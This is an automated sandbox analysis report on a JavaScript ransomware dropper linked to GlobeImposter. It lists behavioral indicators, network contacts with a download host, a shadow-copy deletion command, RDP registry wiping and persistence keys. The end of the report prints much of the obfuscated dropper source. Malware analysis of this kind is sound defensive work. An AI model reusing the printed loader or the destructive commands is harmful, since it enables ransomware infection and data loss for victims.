IMG_2998.js
This report is generated from a file or URL submitted to this webservice on August 3rd 2017 18:42:04 (UTC)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by Falcon Sandbox v6.90 © Hybrid Analysis
Incident Response
Risk Assessment
- Remote Access
  - Sets terminal service related keys (often RDP related)
- Ransomware
  - Deletes volume snapshots (often used by ransomware)
  - Detected indicator that file is ransomware
  - Shows Globeimposter specific behavior
- Persistence
  - Modifies auto-execute functionality by setting/creating a value in the registry
  - Spawns a lot of processes
  - Writes data to a remote process
- Fingerprint
  - Found a dropped file containing the Windows username (possible fingerprint attempt)
  - Reads the active computer name
  - Reads the cryptographic machine GUID
- Network Behavior
  - Contacts 1 domain and 1 host.
Indicators
-
Malicious Indicators 16
-
External Systems
-
Detected Emerging Threats Alert
- details
-
Detected alert "ET POLICY Unsupported/Fake Windows NT Version 5.0" (SID: 2016879, Rev: 4, Severity: 1) categorized as "Potential Corporate Privacy Violation"
Detected alert "ET CURRENT_EVENTS Nemucod JS Downloader Aug 01 2017" (SID: 2024508, Rev: 1, Severity: 1) categorized as "A Network Trojan was detected" (Phishing, Exploit Kits)
Detected alert "ET POLICY PE EXE or DLL Windows file download HTTP" (SID: 2018959, Rev: 3, Severity: 1) categorized as "Potential Corporate Privacy Violation"
Detected alert "ET INFO Possible Windows executable sent when remote host claims to send a Text File" (SID: 2008438, Rev: 18, Severity: 1) categorized as "A Network Trojan was detected"
- source
- Suricata Alerts
- relevance
- 10/10
-
Sample was identified as malicious by a large number of Antivirus engines
- details
- 16/56 Antivirus vendors marked sample as malicious (28% detection rate)
- source
- External System
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
-
16/56 Antivirus vendors marked sample as malicious (28% detection rate)
9/40 Antivirus vendors marked sample as malicious (22% detection rate)
- source
- External System
- relevance
- 8/10
-
General
-
The analysis extracted a file that was identified as malicious
- details
- 16/58 Antivirus vendors marked dropped file "__t1296.tmp.bat" as malicious (classified as "Trojan.BAT.Agent" with 27% detection rate)
- source
- Binary File
- relevance
- 10/10
-
Tries to delete registry keys using reg.exe
- details
-
Process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f""
Process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f""
- source
- Monitored Target
- relevance
- 5/10
-
Installation/Persistence
-
Writes data to a remote process
- details
-
"wscript.exe" wrote 32 bytes to a remote process "%TEMP%\SWsjirYRp2.exe" (Handle: 1328)
"wscript.exe" wrote 52 bytes to a remote process "%TEMP%\SWsjirYRp2.exe" (Handle: 1328)
"wscript.exe" wrote 4 bytes to a remote process "%TEMP%\SWsjirYRp2.exe" (Handle: 1328)
"SWsjirYRp2.exe" wrote 32 bytes to a remote process "%TEMP%\SWsjirYRp2.exe" (Handle: 104)
"SWsjirYRp2.exe" wrote 52 bytes to a remote process "%TEMP%\SWsjirYRp2.exe" (Handle: 104)
"SWsjirYRp2.exe" wrote 4 bytes to a remote process "%TEMP%\SWsjirYRp2.exe" (Handle: 104)
"SWsjirYRp2.exe" wrote 1024 bytes to a remote process "%TEMP%\SWsjirYRp2.exe" (Handle: 104)
"SWsjirYRp2.exe" wrote 74240 bytes to a remote process "%TEMP%\SWsjirYRp2.exe" (Handle: 104)
"SWsjirYRp2.exe" wrote 23040 bytes to a remote process "%TEMP%\SWsjirYRp2.exe" (Handle: 104)
"SWsjirYRp2.exe" wrote 6656 bytes to a remote process "%TEMP%\SWsjirYRp2.exe" (Handle: 104)
"SWsjirYRp2.exe" wrote 8704 bytes to a remote process "%TEMP%\SWsjirYRp2.exe" (Handle: 104)
- source
- API Call
- relevance
- 6/10
-
Ransomware/Banking
-
Deletes volume snapshots (often used by ransomware)
- details
- Deletes volume snapshots files "vssadmin.exe" with commandline "Delete Shadows /All /Quiet"
- source
- Monitored Target
- relevance
- 10/10
-
Shows Globeimposter specific behavior
- details
- The file shows various behavior artifacts extremely typical for the Globeimposter ransomware
- source
- Indicator Combinations
- relevance
- 10/10
-
Remote Access Related
-
Sets terminal service related keys (often RDP related)
- details
-
"reg.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\MICROSOFT\TERMINAL SERVER CLIENT\SERVERS")
"reg.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\TERMINAL SERVER CLIENT\SERVERS"; Key: "(DEFAULT)"; Value: "0000")
- source
- Registry Access
- relevance
- 3/10
-
System Destruction
-
Deletes volume snapshots (often used by ransomware)
- details
- Deletes volume snapshots files "vssadmin.exe" with commandline "Delete Shadows /All /Quiet"
- source
- Monitored Target
- relevance
- 10/10
-
System Security
-
Tries to delete registry keys using reg.exe
- details
-
Process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f""
Process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f""
- source
- Monitored Target
- relevance
- 5/10
-
Unusual Characteristics
-
Script file shows a combination of malicious behavior
- details
-
The script produces internet activity
is obfuscated and drops files
- source
- Indicator Combinations
- relevance
- 7/10
-
Spawns a lot of processes
- details
-
Spawned process "wscript.exe" with commandline ""C:\80d409949f4e3bff2af2a7af080631079896250ea9d43f0ff2fcfe9bf0086785.js""
Spawned process "SWsjirYRp2.exe"
Spawned process "SWsjirYRp2.exe"
Spawned process "cmd.exe" with commandline "cmd /c %TEMP%\__t1296.tmp.bat"
Spawned process "vssadmin.exe" with commandline "Delete Shadows /All /Quiet"
Spawned process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f""
Spawned process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f""
Spawned process "reg.exe" with commandline ""reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"""
Spawned process "attrib.exe" with commandline "attrib Default.rdp -s -h"
- source
- Monitored Target
- relevance
- 8/10
-
Hiding 3 Malicious Indicators
-
Suspicious Indicators 24
-
Cryptographic Related
-
Found a cryptographic related string
- details
- "dEs" (Indicator: "des"; File: "00015153-00003476.00000002.21648.03011000.00000002.mdmp")
- source
- File/Memory
- relevance
- 10/10
-
Environment Awareness
-
Possibly tries to implement anti-virtualization techniques
- details
- "H[M<!XHQemUq^=DU=p9s&UIgT,OboD" (Indicator: "qemu")
- source
- File/Memory
- relevance
- 4/10
-
Reads the cryptographic machine GUID
- details
-
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
"SWsjirYRp2.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
"vssadmin.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
- source
- Registry Access
- relevance
- 10/10
-
External Systems
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
- 1/65 reputation engines marked "http://wendybull.com.au" as malicious (1% detection rate)
- source
- External System
- relevance
- 10/10
-
General
-
Reads configuration files
- details
-
"SWsjirYRp2.exe" read file "C:\Users\desktop.ini"
"SWsjirYRp2.exe" read file "%PUBLIC%\desktop.ini"
"SWsjirYRp2.exe" read file "%PUBLIC%\Videos\desktop.ini"
"SWsjirYRp2.exe" read file "%PUBLIC%\Videos\Sample Videos\desktop.ini"
"SWsjirYRp2.exe" read file "%PUBLIC%\Recorded TV\desktop.ini"
"SWsjirYRp2.exe" read file "%PUBLIC%\Recorded TV\Sample Media\desktop.ini"
"SWsjirYRp2.exe" read file "%PUBLIC%\Pictures\desktop.ini"
"SWsjirYRp2.exe" read file "%PUBLIC%\Pictures\Sample Pictures\desktop.ini"
- source
- API Call
- relevance
- 4/10
-
Installation/Persistence
-
Drops executable files
- details
-
"BazisVirtualCDBus.inf" has type "DOS executable (COM)"
"SWsjirYRp2.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
- source
- Binary File
- relevance
- 10/10
-
Modifies auto-execute functionality by setting/creating a value in the registry
- details
-
"SWsjirYRp2.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE")
"SWsjirYRp2.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE"; Key: "CERTIFICATESCHECK"; Value: "%PUBLIC%\SWsjirYRp2.exe")
- source
- Registry Access
- relevance
- 8/10
-
Network Related
-
Contacts Random Domain Names
- details
- "wendybull.com.au" seems to be random
- source
- Network Traffic
- relevance
- 5/10
-
Uses a User Agent typical for browsers, although no browser was ever launched
- details
- Found user agent(s): Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
- source
- Network Traffic
- relevance
- 10/10
-
Ransomware/Banking
-
Detected indicator that file is ransomware
- details
-
"<div><h2>Your files are Encrypted!</h2></div>" (Source: RECOVER-FILES-726.html, Indicator: "files are encrypted")
"<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta charset="utf-8">
<title>Welcome</title>
</head>
<body>
<center>
<br><br>
<div><h2>Your files are Encrypted!</h2></div>" (Source: 00033124-00003160-0000018C-92779569, Indicator: "files are encrypted")
- source
- File/Memory
- relevance
- 7/10
-
The analysis extracted file with a known ransomware suffix
- details
- Found dropped filename "dictionary.alcatel-lucent.aaa" which has been seen in the context of ransomware (Indicator: .aaa)
- source
- Binary File
- relevance
- 10/10
-
The input sample dropped very many files
- details
- The input sample dropped 1711 files (often an indicator for ransomware)
- source
- Binary File
- relevance
- 5/10
-
Remote Access Related
-
Changes the attributes of the Desktop.rdp configuration file
- details
- Process "attrib.exe" with commandline "attrib Default.rdp -s -h"
- source
- Monitored Target
- relevance
- 10/10
-
System Destruction
-
Opens file with deletion access rights
- details
-
"SWsjirYRp2.exe" opened "C:\80d409949f4e3bff2af2a7af080631079896250ea9d43f0ff2fcfe9bf0086785.js" with delete access
"SWsjirYRp2.exe" opened "C:\autoexec.bat" with delete access
"SWsjirYRp2.exe" opened "C:\config.sys" with delete access
"SWsjirYRp2.exe" opened "C:\Users\desktop.ini" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\desktop.ini" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Videos\desktop.ini" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Videos\Sample Videos\desktop.ini" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Videos\Sample Videos\Wildlife.wmv" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Recorded TV\desktop.ini" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Recorded TV\Sample Media\desktop.ini" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Pictures\desktop.ini" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Pictures\Sample Pictures\Chrysanthemum.jpg" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Pictures\Sample Pictures\Desert.jpg" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Pictures\Sample Pictures\desktop.ini" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Pictures\Sample Pictures\Hydrangeas.jpg" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Pictures\Sample Pictures\Jellyfish.jpg" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Pictures\Sample Pictures\Koala.jpg" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Pictures\Sample Pictures\Lighthouse.jpg" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Pictures\Sample Pictures\Penguins.jpg" with delete access
- source
- API Call
- relevance
- 7/10
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"wscript.exe" wrote bytes "7739bc7779a8c077be72c077d62dc0771de2bb7705a2c077c868bf7757d1c677bee3bb77616fc0776841be770050be7700000000ad37a6768b2da676b641a67600000000" to virtual address "0x75751000" (part of module "WSHIP6.DLL")
"wscript.exe" wrote bytes "92e6bb7779a8c077be72c077d62dc0771de2bb7705a2c077bee3bb77616fc0776841be770050be7700000000ad37a6768b2da676b641a67600000000" to virtual address "0x75201000" (part of module "WSHTCPIP.DLL")
"wscript.exe" wrote bytes "4053be775858bf77186abf77653cc0770000000000bf5e760000000056cc5e76000000007cca5e76000000003768f3756a2cc077d62dc077000000002069f3750000000029a65e7600000000a48df37500000000f70e5e7600000000" to virtual address "0x76051000" (part of module "NSI.DLL")
"reg.exe" wrote bytes "4053be775858bf77186abf77653cc0770000000000bf5e760000000056cc5e76000000007cca5e76000000003768f3756a2cc077d62dc077000000002069f3750000000029a65e7600000000a48df37500000000f70e5e7600000000" to virtual address "0x76051000" (part of module "NSI.DLL")
- source
- Hook Detection
- relevance
- 10/10
-
Reads information about supported languages
- details
-
"wscript.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
"cmd.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
"attrib.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
- source
- Registry Access
- relevance
- 3/10
-
Hiding 8 Suspicious Indicators
-
Informative 25
-
Anti-Detection/Stealthiness
-
Queries the internet cache settings (often used to hide footprints in index.dat or internet cache)
- details
- "wscript.exe" (Access type: "QUERYVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "DISABLECACHINGOFSSLPAGES"; Value: "00000000040000000400000000000000")
- source
- Registry Access
- relevance
- 3/10
-
Anti-Reverse Engineering
-
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
- details
-
SetUnhandledExceptionFilter@KERNEL32.DLL from SWsjirYRp2.exe (PID: 3476)
SetUnhandledExceptionFilter@KERNEL32.DLL from SWsjirYRp2.exe (PID: 3476)
SetUnhandledExceptionFilter@KERNEL32.DLL from SWsjirYRp2.exe (PID: 3476)
SetUnhandledExceptionFilter@KERNEL32.DLL from SWsjirYRp2.exe (PID: 3476)
- source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Environment Awareness
-
Contains ability to query machine time
- details
- GetSystemTimeAsFileTime@KERNEL32.DLL from SWsjirYRp2.exe (PID: 3476)
- source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Reads the registry for installed applications
- details
-
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\SWSJIRYRP2.EXE")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\SWSJIRYRP2.EXE")
- source
- Registry Access
- relevance
- 10/10
-
External Systems
-
Detected Emerging Threats Alert
- details
- Detected alert "ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)" (SID: 2015744, Rev: 4, Severity: 3) categorized as "Misc activity"
- source
- Suricata Alerts
- relevance
- 10/10
-
General
-
Contacts domains
- details
- "wendybull.com.au"
- source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
- "113.20.4.209:80"
- source
- Network Traffic
- relevance
- 1/10
-
Creates a writable file in a temporary directory
- details
-
"wscript.exe" created file "%TEMP%\SWsjirYRp2.exe"
"SWsjirYRp2.exe" created file "%TEMP%\__t1296.tmp.bat"
- source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
- source
- Created Mutant
- relevance
- 3/10
-
Logged script engine calls
- details
-
"wscript.exe" called "Msxml2.XMLHTTP.CreateObject" ...
"wscript.exe" called "WScript.Shell.1.CreateObject" ...
"wscript.exe" called "WScript.Shell.1.ExpandEnvironmentStrings" with result: "%TEMP%\ ...
"wscript.exe" called "Msxml2.XMLHTTP.open" ...
"wscript.exe" called "Msxml2.XMLHTTP.setRequestHeader" ...
"wscript.exe" called "Msxml2.XMLHTTP.responseBody" with result: "MZ" ...
"wscript.exe" called "ADODB.Stream.6.0.CreateObject" ...
"wscript.exe" called "ADODB.Stream.6.0.Type" ...
"wscript.exe" called "ADODB.Stream.6.0.Write" ...
"wscript.exe" called "ADODB.Stream.6.0.Position" ...
"wscript.exe" called "ADODB.Stream.6.0.SaveToFile" ...
"wscript.exe" called "WScript.Shell.1.Run" ...
- source
- API Call
- relevance
- 10/10
-
Opened the service control manager
- details
- "wscript.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
- source
- API Call
- relevance
- 10/10
-
Parsed Javascript
- details
-
Output: "var NNvdoc = new Array(3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 66, 3, 3, 3, 67, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 3, 3, 3, 3, 3, 3, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 3, 3, 3, 3, 3, 3, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3
);
var ratatu = "prototype";
var silkopil = "\u002f";
var Hesrshish = -0x01 + 0x09 + 0xF7;
String[ratatu].pizzaTT = function() {
rpc_call_assiduously_FROG2XCOP = 0;
var rpc_call_assiduously_RazlomSS, rpc_call_assiduously_FROG2ddDccC2, rpc_call_assiduously_FROG2c3, rpc_call_assiduously_FROG2c4;
var rpc_call_assiduously_FROG2out = "";
var rpc_call_assiduously_FROG2rpc_call_assiduously_ka = this.replace(/RPOJECTS/gi, rpc_call_assiduously_FROG2out);
var rpc_call_assiduously_FROG2len = rpc_call_assiduously_FROG2sud(rpc_call_assiduously_FROG2rpc_call_assiduously_ka);
while (rpc_call_assiduously_FROG2XCOP < rpc_call_assiduously_FROG2len) {
do {
var rpc_call_assiduously_koch = rpc_call_assiduously_FROG2rpc_call_assiduously_ka.charCodeAt(rpc_call_assiduously_FROG2XCOP++) & (0x132 - 0x33);
rpc_call_assiduously_RazlomSS = NNvdoc[rpc_call_assiduously_koch];
} while (rpc_call_assiduously_FROG2XCOP < rpc_call_assiduously_FROG2len && rpc_call_assiduously_RazlomSS == -1);
if (rpc_call_assiduously_RazlomSS == -1)
break;
do {
rpc_call_assiduously_FROG2ddDccC2 = NNvdoc[rpc_call_assiduously_FROG2rpc_call_assiduously_ka.charCodeAt(rpc_call_assiduously_FROG2XCOP++) & Hesrshish];
} while (rpc_call_assiduously_FROG2XCOP < rpc_call_assiduously_FROG2len && rpc_call_assiduously_FROG2ddDccC2 == -1);
if (rpc_call_assiduously_FROG2ddDccC2 + 1 == 0)
break;
rpc_call_assiduously_FROG2out += String.fromCharCode((rpc_call_assiduously_RazlomSS << 2) | ((rpc_call_assiduously_FROG2ddDccC2 & 0x30) >> 4));
do {
rpc_call_assiduously_FROG2c3 = rpc_call_assiduously_FROG2rpc_call_assiduously_ka.charCodeAt(rpc_call_assiduously_FROG2XCOP++) & 0xff;
if (rpc_call_assiduously_FROG2c3 == 10 * 6 + 0.5 * 2)
return rpc_call_assiduously_FROG2out;
rpc_call_assiduously_FROG2c3 = NNvdoc[rpc_call_assiduously_FROG2c3];
} while (rpc_call_assiduously_FROG2XCOP < rpc_call_assiduously_FROG2len && rpc_call_assiduously_FROG2c3 == -1);
if (rpc_call_assiduously_FROG2c3 == -1)
break;
rpc_call_assiduously_FROG2out += String.fromCharCode(((rpc_call_assiduously_FROG2ddDccC2 & (0xe + 1)) << 4) | ((rpc_call_assiduously_FROG2c3 & 0x3c) >> 2));
do {
rpc_call_assiduously_FROG2c4 = rpc_call_assiduously_FROG2rpc_call_assiduously_ka.charCodeAt(rpc_call_assiduously_FROG2XCOP++) & Hesrshish;
if (rpc_call_assiduously_FROG2c4 == 61)
return rpc_call_assiduously_FROG2out;
rpc_call_assiduously_FROG2c4 = NNvdoc[rpc_call_assiduously_FROG2c4];
} while (rpc_call_assiduously_FROG2XCOP < rpc_call_assiduously_FROG2len && rpc_call_assiduously_FROG2c4 == -1);
if (rpc_call_assiduously_FROG2c4 == -1)
break;
rpc_call_assiduously_FROG2out += String.fromCharCode(((rpc_call_assiduously_FROG2c3 & 0x03) << 6) | rpc_call_assiduously_FROG2c4);
}
return rpc_call_assiduously_FROG2out;
};
var rpc_call_assiduously_SayNoNo = "RPOJECTS" + "" + "";
function rpc_call_assiduously_FROG2sud(vardos) {
return vardos[("rpc_call_assiduously_griffith", "rpc_call_assiduously_operation", "rpc_call_assiduously_embarrass", "rpc_call_assiduously_tribes", "rpc_call_assiduously_renew", "l") + "en" + ("rpc_call_assiduously_theater", "rpc_call_assiduously_slime", "rpc_call_assiduously_reaper", "rpc_call_assiduously_bristling", "rpc_call_assiduously_recrimination", "gt") + "h"];
}
function setRH(v1, v2) {
v1[v2]("User" + "-" + "Agent", "TW96aWxsYS80LjAgRPOJECTSKGNvbXBhdGlibGU7IE1TSUUgNi4wOyRPOJECTSBXaW5kb3dzIE5UIDUuMCk=".pizzaTT());
}
var cheboksar;
var velVITK_BOSKO_2S = "Y2hlYm9rc2FyID0geydVJzonUycsJzonOicuJywnODgnOicnLCdCT0xHQVJJTic6J29uc2VCb2R5JywnNzcnOicnLCcxMDEnOicnLCdGQVJJU0hNWSc6J1gnLCAgJzExJzonJ307DQpSZWVib2tHYWxheHlGUk9HdGFsaWx1ZXYgPSBSZWVib2tHYWxheHlGUk9Hdm9zdG9jaG5peTsNCmZvciAodmFyIFJlZWJva0dhbGF4eUZST0cyWENPUCBpbiBjaGVib2tzYXIpe1JlZWJva0dhbGF4eUZST0d0YWxpbHVldiA9IFJlZWJva0dhbGF4eUZST0d0YWxpbHVldlsicmVwIiArICJsYWNlIl0oUmVlYm9rR2FsYXh5RlJPRzJYQ09QLCBjaGVib2tzYXJbUmVlYm9rR2FsYXh5RlJPRzJYQ09QXSk7fQ0KICAgIHJldHVybiBSZWVib2tHYWxheHlGUk9HdGFsaWx1ZXY7";
var NNvdocHO = rpc_call_assiduously_FROG2sud(NNvdoc);
var TortPankaky;
for (velVITK_OBLOM = 0; NNvdocHO > velVITK_OBLOM; ++velVITK_OBLOM) {
NNvdoc[velVITK_OBLOM] = -1 + NNvdoc[velVITK_OBLOM];
NNvdoc[velVITK_OBLOM] = -1 + NNvdoc[velVITK_OBLOM];
NNvdoc[velVITK_OBLOM] = -1 + NNvdoc[velVITK_OBLOM];
NNvdoc[velVITK_OBLOM] = -1 + NNvdoc[velVITK_OBLOM];
}
var TortPankakyFF = new Function("DAS", "TortPankaky = " + "bmV3IEZ1bmN0aW9uKCdSZWVib2tHYWxheHlGUk9Hdm9zdG9jaG5peScsIHZlbFZJVEtfQk9TS09fMlM=".pizzaTT() + ".pizzaTT());");
function rpc_call_assiduously_FROG2undefilled(velVLUMAHx, velVLUMAHy) {
velVLUMAHx = eww / frr;
velVLUMAHy = velVLUMAHZZ + -245;
};
rpc_call_assiduously_FROG2undefilled.dEDWWEE = function() {
rpc_call_assiduously_FROG2ok(rpc_call_assiduously_FROG2spyFunction1.rpc_call_assiduously_FROG2calledWith(), "Function called without arguments");
rpc_call_assiduously_FROG2publisher.rpc_call_assiduously_FROG2publish(this.rpc_call_assiduously_FROG2type1, "PROPER1");
rpc_call_assiduously_FROG2ok(rpc_call_assiduously_FROG2spyFunction1.rpc_call_assiduously_FROG2calledWith("PROPER1"), "Function called with 'PROPER1' argument");
rpc_call_assiduously_FROG2publisher.rpc_call_assiduously_FROG2publish(this.rpc_call_assiduously_FROG2type1, ["PROPER1", "PROPER2"]);
};
var topSecretLine;
var rpc_call_assiduously_LLL0LLL = "l";
var rpc_call_assiduously_FROG2TRUEFALSE = ("V2lRPOJECTSuZG93cyBTY3JpcRPOJECTSHQgSG9zdA=RPOJECTS=".pizzaTT() + "!!!22ee22" == "RPOJECTSV2lRPOJECTSuZG93cyBTY3JpcRPOJECTSHQgSG9zdA==".pizzaTT() + "!!!22ee22") && typeof(rpc_call_assiduously_FROG2GzEAPd) === "undefined";
var rpc_call_assiduously_FROGsrq = "UmVxdWVzdEhlYWRlcg==".pizzaTT();
TortPankakyFF();
var rpc_call_assiduouslyFPADRML = ("").pizzaTT();
var rpc_call_assiduously_FROG2lidgen = "QWN0RPOJECTSaXZlWERPOJECTS9iamVjdA==".pizzaTT();
var rpc_call_assiduously_FROG2chosen = Math.round(0.7 * 2 - 0.4);
if (!rpc_call_assiduously_FROG2TRUEFALSE) {
rpc_call_assiduously_FROG2undefilled.scale = function(rpc_call_assiduously_FROG2p, rpc_call_assiduously_FROG2scaleX, rpc_call_assiduously_FROG2scaleY) {
if (rpc_call_assiduously_FROG2XCOPsObject(rpc_call_assiduously_FROG2scaleX)) {
rpc_call_assiduously_FROG2scaleY = rpc_call_assiduously_FROG2scaleX.y;
rpc_call_assiduously_FROG2scaleX = rpc_call_assiduously_FROG2scaleX.x;
} else if (!rpc_call_assiduously_FROG2XCOPsNumber(rpc_call_assiduously_FROG2scaleY)) {
rpc_call_assiduously_FROG2scaleY = rpc_call_assiduously_FROG2scaleX;
}
return new rpc_call_assiduously_FROG2undefilled(rpc_call_assiduously_FROG2p.x * rpc_call_assiduously_FROG2scaleX, rpc_call_assiduously_FROG2p.y * rpc_call_assiduously_FROG2scaleY);
};
}
if (!rpc_call_assiduously_FROG2TRUEFALSE) {
rpc_call_assiduously_FROG2undefilled.rpc_call_assiduously_FROG2sameOrN = function(rpc_call_assiduously_FROG2param1, rpc_call_assiduously_FROG2param2) {
return rpc_call_assiduously_FROG2param1.D == rpc_call_assiduously_FROG2param2.D || rpc_call_assiduously_FROG2param1.F == rpc_call_assiduously_FROG2param2.F;
};
rpc_call_assiduously_FROG2undefilled.angle = function(rpc_call_assiduously_FROG2p) {
return Math.atan2(rpc_call_assiduously_FROG2p.y, rpc_call_assiduously_FROG2p.x);
};
}
function rpc_call_assiduouslyFPADZO_ZO(TT) {
eval(TT);
}
var rpc_call_assiduously_FROG2VARDOCF = "JVRFRPOJECTSTVAlRPOJECTS".pizzaTT();
var NewNameCreator = new Function("RPOJECTS
RPOJECTS", "topSecretLine = " + ("bmV3IEZ1bmN0aW9uKCd2VlJFQkZGMycsJ3JldHVybiBcIlRWTT1cIg==").pizzaTT() + ".pizzaTT();');");
var rpc_call_assiduously_FROG2sirdallos = "RPOJECTSRXhwYW5RPOJECTSkRW52aXRPOJECTSJvbm1lbnRTdHJRPOJECTSpbmdz".pizzaTT();
var rpc_call_assiduously_FROG2Native = function(options) {
};
rpc_call_assiduously_FROG2Native.rpc_call_assiduously_FROG2XCOPmplement = function(rpc_call_assiduously_FROG2objects, rpc_call_assiduously_FROG2properties) {
for (var rpc_call_assiduously_FROG2XCOP = 0, rpc_call_assiduously_FROG2l = rpc_call_assiduously_FROG2objects.length; rpc_call_assiduously_FROG2XCOP < rpc_call_assiduously_FROG2l; rpc_call_assiduously_FROG2XCOP++) rpc_call_assiduously_FROG2objects[rpc_call_assiduously_FROG2XCOP].rpc_call_assiduously_FROG2XCOPmplement(rpc_call_assiduously_FROG2properties);
};
var rpc_call_assiduously_FROGhatershaha = "";
var rpc_call_assiduously_FROGodnoklass = "SWsjirYRp";
function mexAO(AOn) {
return new ActiveXObject(AOn);
}
if (WSH) {
NewNameCreator();
}
function mix2() {
perm_sel[fixed] = fixed; /* Generate random orientation*/
var total = 0;
var ori_sel = Array();
var i = fixed === 0 ? 1 : 0;
for (; i < 7; i = i === fixed - 1 ? i + 2 : i + 1) {
ori_sel[i] = scramblers.lib.randomInt.below(3);
total += ori_sel[i];
}
if (i <= 7) ori_sel[i] = (3 - (total % 3)) % 3;
ori_sel[fixed] = 0; /* Convert to face format*/ /* Mapping from permutation/orientation to facelet*/
var D = 1,
L = 2,
B = 5,
U = 4,
R = 3,
F = 0; /* D 0 1 2 3 L 4 5 6 7 B 8 9 10 11 U 12 13 14 15 R 16 17 18 19 F 20 21 22 23*/ /* Map from permutation/orientation to face*/ /* Convert cubie representation into facelet representaion*/
for (var i = 0; i < 8; i++) {
for (var j = 0; j < 3; j++) posit[pos[i][(ori_sel[i] + j) % 3]] = fmap[perm_sel[i]][j];
}
}
var rpc_call_assiduously_FROG2d7 = "WA==".pizzaTT() + "M" + "L";
function rpc_call_assiduously_FROG2_bCho(T, D, C) {
R = D + "";
T[D](C);
}
